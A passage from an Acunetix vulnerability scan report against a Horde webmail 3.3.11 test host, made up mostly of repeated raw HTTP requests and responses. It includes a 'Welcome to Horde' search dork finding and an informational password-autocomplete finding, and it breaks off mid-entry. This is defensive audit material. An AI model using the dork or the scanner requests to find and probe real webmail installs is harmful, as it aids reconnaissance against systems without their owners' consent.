GET /imp/login.php?app=imp&horde_logout_token=X15QsD-1zAYbNp-KXZCaCs97Ev4&imapuser=uwbkfapt&logout_reason=badlogin&server=pop HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 |
||||||||||||||||||
Acunetix Website Audit | 60 |
Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:09 GMT |
||||||||||||||||||
/imp/login.php (b80345ac9e258e2e5fc0788690b47d67) | ||||||||||||||||||
Details | ||||||||||||||||||
We found intitle:welcome.to.horde |
||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?new_lang=Bosanski HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:21 GMT Content-Length: 10191 |
||||||||||||||||||
/imp/login.php (eb39b850bb307c9b610a48be2af0d636) | ||||||||||||||||||
Details | ||||||||||||||||||
We found intitle:welcome.to.horde |
||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?app=imp&horde_logout_token=WpLNAAqx7QwZs-m-mA-TXAsylgU&imapuser=gmbrshlo&logout_reason=badlogin&server=pop HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT |
||||||||||||||||||
Acunetix Website Audit | 61 |
Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:13 GMT |
||||||||||||||||||
/imp/login.php (f9867d029cae700bee7e0e09c3c5e9bc) | ||||||||||||||||||
Details | ||||||||||||||||||
We found intitle:welcome.to.horde |
||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?app=imp&horde_logout_token=5HmQhu81IJ8NQd3wg4Xsyucnj7Q&imapuser=lwnnwvll&logout_reason=badlogin&server=pop HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:13 GMT Content-Length: 10396 |
||||||||||||||||||
/imp/login.php (fa2cb8a65862e58974030595118192cb) | ||||||||||||||||||
Details | ||||||||||||||||||
We found intitle:welcome.to.horde |
||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?new_lang=%26%23x202d;Arabic%20(Oman)%20%26%23x202e;(%26%23x0627;%26%23x0644;%26%23x0639;%26%23x0631;%26%23x0628;%26%23x064a;%26%23x0629;) HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 |
||||||||||||||||||
Acunetix Website Audit | 62 |
Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:21 GMT |
||||||||||||||||||
/imp/redirect.php | ||||||||||||||||||
Details | ||||||||||||||||||
We found intitle:welcome.to.horde |
||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/redirect.php HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php Cookie: Horde=cc98ab8bb445fe090d5f7b594f58e208; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:03 GMT Content-Length: 10193 |
||||||||||||||||||
Password type input with autocomplete enabled | ||||||||||||||||||
![]() |
||||||||||||||||||
Severity | Informational | |||||||||||||||||
Type | Informational | |||||||||||||||||
Reported by module | Crawler | |||||||||||||||||
Description | ||||||||||||||||||
When a new name and password is entered in a form and the form is submitted, the browser asks if the password should be saved. Thereafter when the form is displayed, the name and password are filled in automatically or are completed as the name is entered. An attacker with local access could obtain the cleartext password from the browser cache. | ||||||||||||||||||
Impact | ||||||||||||||||||
Possible sensitive information disclosure | ||||||||||||||||||
Recommendation | ||||||||||||||||||
The password autocomplete should be disabled in sensitive applications. To disable autocomplete, you may use a code similar to: <INPUT TYPE="password" AUTOCOMPLETE="off"> |
||||||||||||||||||
Affected items | ||||||||||||||||||
Acunetix Website Audit | 63 |
/imp | ||||||||||||||||||
Details | ||||||||||||||||||
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/ HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/ Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:11 GMT Content-Length: 10191 |
||||||||||||||||||
/imp/index.php | ||||||||||||||||||
Details | ||||||||||||||||||
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/index.php HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:11 GMT Content-Length: 10191 |
||||||||||||||||||
/imp/login.php | ||||||||||||||||||
Details | ||||||||||||||||||
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled. | ||||||||||||||||||
Acunetix Website Audit | 64 |
Request | ||||||||||||||||||
GET /imp/login.php HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 Set-Cookie: Horde=cc98ab8bb445fe090d5f7b594f58e208; path=/; domain=vulnerable.horde.webmail.version3.3.11.host Set-Cookie: imp_key=cc98ab8bb445fe090d5f7b594f58e208; path=/; domain=vulnerable.horde.webmail.version3.3.11.host Set-Cookie: auth_key=cc98ab8bb445fe090d5f7b594f58e208; path=/; domain=vulnerable.horde.webmail.version3.3.11.host X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:03 GMT Content-Length: 10312 |
||||||||||||||||||
/imp/login.php (0543eee9a9fc90cdbcebb4184dc0f436) | ||||||||||||||||||
Details | ||||||||||||||||||
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?app=imp&horde_logout_token=UkHoj_BUzaHgQnp7cwu9IPDGdx0&imapuser=cderdwxu&logout_reason=badlogin&server=pop HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:13 GMT Content-Length: 10396 |
||||||||||||||||||
/imp/login.php (158764c7d282ec5f81da00419114f313) | ||||||||||||||||||
Details | ||||||||||||||||||
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled. | ||||||||||||||||||
Acunetix Website Audit | 65 |
Request | ||||||||||||||||||
GET /imp/login.php?new_lang=%26%23x202d;Chinese%20(Traditional)%20(%26%23x6b63;%26%23x9ad4;%26%23x4e2d;%26%23x6587;) HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:22 GMT Content-Length: 10190 |
||||||||||||||||||
/imp/login.php (1d46c5eb93aa7d11eef06bf0a0191c08) | ||||||||||||||||||
Details | ||||||||||||||||||
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?app=imp&horde_logout_token=9kdIZoVZfUu0i92_Wr0XpxEkycw&imapuser=kknytbhi&logout_reason=badlogin&server=pop HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:09 GMT Content-Length: 10396 |
||||||||||||||||||
/imp/login.php (1d86503a775e69aaf8cfae2e3c4262b8) | ||||||||||||||||||
Details | ||||||||||||||||||
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled. | ||||||||||||||||||
Request | ||||||||||||||||||
Acunetix Website Audit | 66 |
GET /imp/login.php?app=imp&horde_logout_token=8MnlK_AkVv_w-etJcyh00h3qZtk&imapuser=atsoewoc&logout_reason=badlogin&server=pop HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:09 GMT Content-Length: 10396 |
||||||||||||||||||
/imp/login.php (218aabb29b4f5701fbeef27d6e22e8ae) | ||||||||||||||||||
Details | ||||||||||||||||||
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?new_lang=%26%23x202d;Bulgarian%20(%26%23x0411;%26%23x044a;%26%23x043b;%26%23x0433;%26%23x0430;%26%23x0440;%26%23x0441;%26%23x043a;%26%23x0438;) HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:21 GMT Content-Length: 10191 |
||||||||||||||||||
/imp/login.php (28fc832e122bfd3d7aa0d9fc9e93c214) | ||||||||||||||||||
Details | ||||||||||||||||||
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled. | ||||||||||||||||||
Request | ||||||||||||||||||
Acunetix Website Audit | 67 |
GET /imp/login.php?app=imp&horde_logout_token=fxkAiJl0cUvTGsyglzEAgwmsGvk&imapuser=bsximucj&logout_reason=badlogin&server=pop HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:09 GMT Content-Length: 10396 |
||||||||||||||||||
/imp/login.php (2a85dcb007870d301225d725fb7aced5) | ||||||||||||||||||
Details | ||||||||||||||||||
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?app=imp&horde_logout_token=S9hLBWmjg9w-hz-Cez65kwSQFDI&imapuser=hkuhjfvd&logout_reason=badlogin&server=pop HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:10 GMT Content-Length: 10396 |
||||||||||||||||||
/imp/login.php (36ce5744f27f6f06f85c2dac9f0ac09c) | ||||||||||||||||||
Details | ||||||||||||||||||
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled. | ||||||||||||||||||
Request | ||||||||||||||||||
Acunetix Website Audit | 68 |
GET /imp/login.php?app=imp&horde_logout_token=rpo9s0fEQvr-PL8-6YEmPmL6eYE&imapuser=vhqsmkqh&logout_reason=badlogin&server=pop HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:13 GMT Content-Length: 10396 |
||||||||||||||||||
/imp/login.php (3a784d3148a695e5246e4f7712293772) | ||||||||||||||||||
Details | ||||||||||||||||||
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?app=imp&horde_logout_token=4IdDEVByjuc3qQ9aCCZa_zV1Ju0&imapuser=lyoxhoba&logout_reason=badlogin&server=pop HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:09 GMT Content-Length: 10396 |
||||||||||||||||||
/imp/login.php (4435f865242a495136a5f5376d63a435) | ||||||||||||||||||
Details | ||||||||||||||||||
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled. | ||||||||||||||||||
Request | ||||||||||||||||||
Acunetix Website Audit | 69 |
GET /imp/login.php?app=imp&horde_logout_token=pdL5-YjGG7Nh5C6m9jNlmZpORww&imapuser=ivxkbmfl&logout_reason=badlogin&server=pop HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:13 GMT Content-Length: 10396 |
||||||||||||||||||
/imp/login.php (4bff40967d6a993cb33f6ffe4f726c45) | ||||||||||||||||||
Details | ||||||||||||||||||
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?new_lang=%26%23x202d;Chinese%20(Simplified)%20(%26%23x7b80;%26%23x4f53;%26%23x4e2d;%26%23x6587;) HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:21 GMT Content-Length: 10191 |
||||||||||||||||||
/imp/login.php (733b34e2771d847f3e677868a914fc27) | ||||||||||||||||||
Details | ||||||||||||||||||
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled. | ||||||||||||||||||
Request | ||||||||||||||||||
Acunetix Website Audit | 70 |
GET /imp/login.php?app=imp&horde_logout_token=TDQA5rJjyTg4m99KcTR4_kGc2Ck&imapuser=ggqsiwfl&logout_reason=badlogin&server=pop HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:09 GMT Content-Length: 10395 |
||||||||||||||||||
/imp/login.php (7f2892c38a099a99d15882e6395df8ed) | ||||||||||||||||||
Details | ||||||||||||||||||
